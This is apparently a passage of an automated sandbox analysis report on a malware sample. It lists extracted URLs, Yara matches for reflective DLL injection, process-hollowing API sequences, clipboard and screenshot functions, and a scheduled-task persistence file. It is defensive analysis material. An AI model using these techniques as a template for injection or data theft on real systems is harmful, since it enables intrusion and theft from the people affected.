Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000004.00000000.2066603654.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3104194293.000000000C860000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000001F.00000002.2611004439.000002E54E305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2246646592.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260592335.00000204B9869000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2268073543.00000204B9878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: CC11.tmp.ctx.exe, 00000010.00000002.2267400356.00000204B97C0000.00000004.00001000.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2259255483.00000204B78F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: explorer.exe, 00000004.00000003.3097199037.000000000C512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3585518944.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3101150839.000000000C54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2064379005.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021991FFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001F.00000002.2524411157.000002E537483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021991FFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: explorer.exe, 00000004.00000002.3414214049.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000004.00000002.3489127190.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000004.00000002.3414214049.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2050311869.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000003.3104504813.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2048558818.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3383796539.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: CC11.tmp.ctx.exe, 00000010.00000002.2266815528.00000204B9480000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: powershell.exe, 00000020.00000002.2604795771.00000219A8BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.t.com/fwlink/?Li955
Source: powershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000004.00000002.3585518944.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2064379005.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Windows\explorer.exe

Code function: 4_2_09837AF0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_09837AF0

Source: C:\Windows\explorer.exe

Code function: 4_2_09837CE0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

4_2_09837CE0

Source: C:\Windows\explorer.exe

Code function: 4_2_09837AF0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_09837AF0

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe

Code function: 18_2_006961F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

18_2_006961F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.0.explorer.exe.3320000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.17002c7d000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.9820000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.3320000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.9820000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.ca78220.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.17002c7d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.ca78220.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E382048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,	0_2_00007FF79E382048
Source: C:\Windows\explorer.exe	Code function: 4_2_09821370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,	4_2_09821370
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D2048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,	6_2_00007FF6743D2048

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe

File created: C:\Windows\Tasks\Gxtuum.job

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E38345C	0_2_00007FF79E38345C
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E382048	0_2_00007FF79E382048
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52B345C	1_2_00007FF7E52B345C
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52B2048	1_2_00007FF7E52B2048
Source: C:\Windows\explorer.exe	Code function: 4_2_03341B24	4_2_03341B24
Source: C:\Windows\explorer.exe	Code function: 4_2_0334C304	4_2_0334C304
Source: C:\Windows\explorer.exe	Code function: 4_2_03320BF0	4_2_03320BF0
Source: C:\Windows\explorer.exe	Code function: 4_2_0334BAB0	4_2_0334BAB0
Source: C:\Windows\explorer.exe	Code function: 4_2_03327140	4_2_03327140
Source: C:\Windows\explorer.exe	Code function: 4_2_033271F3	4_2_033271F3
Source: C:\Windows\explorer.exe	Code function: 4_2_033271FD	4_2_033271FD
Source: C:\Windows\explorer.exe	Code function: 4_2_033271E1	4_2_033271E1
Source: C:\Windows\explorer.exe	Code function: 4_2_033271EB	4_2_033271EB
Source: C:\Windows\explorer.exe	Code function: 4_2_033271D7	4_2_033271D7
Source: C:\Windows\explorer.exe	Code function: 4_2_033271CD	4_2_033271CD
Source: C:\Windows\explorer.exe	Code function: 4_2_0334A0D8	4_2_0334A0D8
Source: C:\Windows\explorer.exe	Code function: 4_2_033447D0	4_2_033447D0
Source: C:\Windows\explorer.exe	Code function: 4_2_0333F6E8	4_2_0333F6E8
Source: C:\Windows\explorer.exe	Code function: 4_2_03348ED4	4_2_03348ED4
Source: C:\Windows\explorer.exe	Code function: 4_2_033266C0	4_2_033266C0
Source: C:\Windows\explorer.exe	Code function: 4_2_0333FD28	4_2_0333FD28
Source: C:\Windows\explorer.exe	Code function: 4_2_0334D500	4_2_0334D500
Source: C:\Windows\explorer.exe	Code function: 4_2_03341DBC	4_2_03341DBC
Source: C:\Windows\explorer.exe	Code function: 4_2_033345E0	4_2_033345E0
Source: C:\Windows\explorer.exe	Code function: 4_2_0334DC32	4_2_0334DC32
Source: C:\Windows\explorer.exe	Code function: 4_2_03344420	4_2_03344420
Source: C:\Windows\explorer.exe	Code function: 4_2_033494F8	4_2_033494F8
Source: C:\Windows\explorer.exe	Code function: 4_2_098351E0	4_2_098351E0
Source: C:\Windows\explorer.exe	Code function: 4_2_098272C0	4_2_098272C0
Source: C:\Windows\explorer.exe	Code function: 4_2_098217F0	4_2_098217F0
Source: C:\Windows\explorer.exe	Code function: 4_2_098429BC	4_2_098429BC
Source: C:\Windows\explorer.exe	Code function: 4_2_0984E100	4_2_0984E100
Source: C:\Windows\explorer.exe	Code function: 4_2_09840928	4_2_09840928
Source: C:\Windows\explorer.exe	Code function: 4_2_0984A0F8	4_2_0984A0F8
Source: C:\Windows\explorer.exe	Code function: 4_2_09845020	4_2_09845020
Source: C:\Windows\explorer.exe	Code function: 4_2_0984E832	4_2_0984E832
Source: C:\Windows\explorer.exe	Code function: 4_2_098453D0	4_2_098453D0
Source: C:\Windows\explorer.exe	Code function: 4_2_09849AD4	4_2_09849AD4
Source: C:\Windows\explorer.exe	Code function: 4_2_098402E8	4_2_098402E8
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DCD	4_2_09827DCD
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DD7	4_2_09827DD7
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DE1	4_2_09827DE1
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DEB	4_2_09827DEB
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DF3	4_2_09827DF3
Source: C:\Windows\explorer.exe	Code function: 4_2_09827DFD	4_2_09827DFD
Source: C:\Windows\explorer.exe	Code function: 4_2_09827D40	4_2_09827D40
Source: C:\Windows\explorer.exe	Code function: 4_2_0984ACD8	4_2_0984ACD8
Source: C:\Windows\explorer.exe	Code function: 4_2_0984CF04	4_2_0984CF04
Source: C:\Windows\explorer.exe	Code function: 4_2_09842724	4_2_09842724
Source: C:\Windows\explorer.exe	Code function: 4_2_0984C6B0	4_2_0984C6B0
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D2048	6_2_00007FF6743D2048
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D345C	6_2_00007FF6743D345C
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91B345C	8_2_00007FF7A91B345C
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91B2048	8_2_00007FF7A91B2048
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179D345C	9_2_00007FF7179D345C
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179D2048	9_2_00007FF7179D2048
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69002FBD8	11_2_00007FF69002FBD8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690035C74	11_2_00007FF690035C74
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690011000	11_2_00007FF690011000
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69003518C	11_2_00007FF69003518C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900291B0	11_2_00007FF6900291B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69002D200	11_2_00007FF69002D200
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690038A38	11_2_00007FF690038A38
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690020A60	11_2_00007FF690020A60
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690021280	11_2_00007FF690021280
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690027AAC	11_2_00007FF690027AAC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690018B20	11_2_00007FF690018B20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690030B84	11_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900333BC	11_2_00007FF6900333BC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900273F4	11_2_00007FF6900273F4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690020C64	11_2_00007FF690020C64
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690021484	11_2_00007FF690021484
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690022CC4	11_2_00007FF690022CC4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69002CD6C	11_2_00007FF69002CD6C
